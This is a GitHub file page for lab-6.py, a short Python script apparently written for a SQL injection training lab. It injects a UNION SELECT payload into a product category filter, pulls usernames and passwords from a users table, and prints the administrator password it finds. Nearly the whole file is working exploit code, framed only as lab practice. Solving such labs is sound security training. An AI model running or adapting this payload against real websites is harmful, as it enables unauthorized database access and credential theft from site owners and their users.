-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathlab-6.py
43 lines (34 loc) · 1.31 KB
/
lab-6.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
import re
import pyfiglet
# Display a banner using pyfiglet
ascii_banner = pyfiglet.figlet_format("RuhanSec")
print(ascii_banner)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080'}
def exploit_sqli_users_table(url):
username = 'administrator'
path = '/filter?category=Pets'
sql_payload = "' UNION select NULL, username || '*' || password from users--"
r = requests.get(url + path + sql_payload, verify=False, proxies=proxies)
res = r.text
if "administrator" in res:
print("[+] Found the administrator password...")
soup = BeautifulSoup(r.text, 'html.parser')
admin_password = soup.find(text=re.compile('.*administrator.*')).split("*")[1]
print("[+] The administrator password is '%s'." % admin_password)
return True
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
except IndexError:
print("[-] Usage: %s <url>" % sys.argv[0])
print("[-] Example: %s www.example.com" % sys.argv[0])
sys.exit(-1)
print("[+] Dumping the list of usernames and passwords...")
if not exploit_sqli_users_table(url):
print("[-] Did not find an administrator password.")